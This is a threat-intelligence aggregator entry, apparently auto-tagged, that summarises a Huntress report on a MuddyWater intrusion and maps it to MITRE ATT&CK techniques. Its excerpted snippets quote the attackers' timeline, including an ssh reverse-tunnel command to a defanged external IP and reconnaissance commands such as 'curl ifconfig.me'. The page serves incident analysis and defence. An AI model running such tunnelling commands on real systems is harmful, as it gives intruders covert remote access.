TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Unmasking an Attack Chain of MuddyWater

2026-03-06 · Read original ↗

ATT&CK techniques detected

5 predictions
T1059.001PowerShell
96%
“, more stable session. 2026 - 01 - 24 22 : 22 : 03 " " c : \ windows \ system32 \ openssh \ ssh. exe " " - p 22 - o stricthostkeychecking = no [ email protected ] [. ] 185 - 2 - 4 - n - r 10841 2026 - 01 - 24 22 : 25 : 48 " " c : \ windows \ system32 \ windowspowershell \ v1 \ po…”
T1059.001PowerShell
81%
“- 24 23 : 05 : 44 ping 157. 20. 182 [. ] 49 2026 - 01 - 24 23 : 12 : 15 curl ifconfig [. ] me 2026 - 01 - 24 23 : 21 : 31 fmapp. exe after a few seconds have passed, they open another powershell session : 2026 - 01 - 25 00 : 14 : 32 powershell the above timeline excerpt illustrat…”
T1071Application Layer Protocol
57%
“unmasking an attack chain of muddywater acknowledgments : special thanks to tyler marzen and anna pham for their contributions to this investigation and write - up. tl ; dr : huntress has identified and detailed a full timeline of an intrusion in a customer environment that align…”
T1021.001Remote Desktop Protocol
43%
“activity the initial access to the endpoint was achieved through a terminal services / rdp login. a timeline excerpt developed from detection data appears as follows : figure 2 : timeline of activities there are a few observations that we can make from some of the commands that w…”
T1572Protocol Tunneling
36%
“activity the initial access to the endpoint was achieved through a terminal services / rdp login. a timeline excerpt developed from detection data appears as follows : figure 2 : timeline of activities there are a few observations that we can make from some of the commands that w…”

Summary

Huntress has identified and detailed a full timeline of an intrusion in a customer environment that aligns with what others have identified as MuddyWater (Iranian-linked APT).